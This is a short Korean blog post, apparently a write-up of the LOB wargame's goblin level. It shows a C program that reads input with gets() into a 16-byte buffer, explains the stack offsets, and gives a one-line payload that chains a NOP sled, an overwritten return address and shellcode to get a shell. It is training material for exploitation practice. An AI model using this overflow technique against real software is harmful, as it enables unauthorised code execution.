- int main()
- {
- char buffer[16];
- gets(buffer);
- printf("%s\n",buffer);
- }
대놓고 취약점을 준다.
buffer(16) + sfp(4) + ret(4) 나머지는 D로 채웠다.
0x43434343으로 덮인 곳이 ret의 주소이고 이 주소를 덮으면 될 것 같다.
덮을 주소는 적당하게 0xbffffb74를 주도록하자.
payload
$(python -c 'print "\x90"*20 + "\x74\xfb\xff\xbf" + "\x90"*200 + shellcode';cat) | ./goblin
hackers proof
'pwnable > LOB' 카테고리의 다른 글
LOB goblin -> orc (0) | 2017.02.07 |
---|---|
LOB gremlin -> cobolt (0) | 2017.02.07 |
LOB - gate -> gremlin (0) | 2017.02.07 |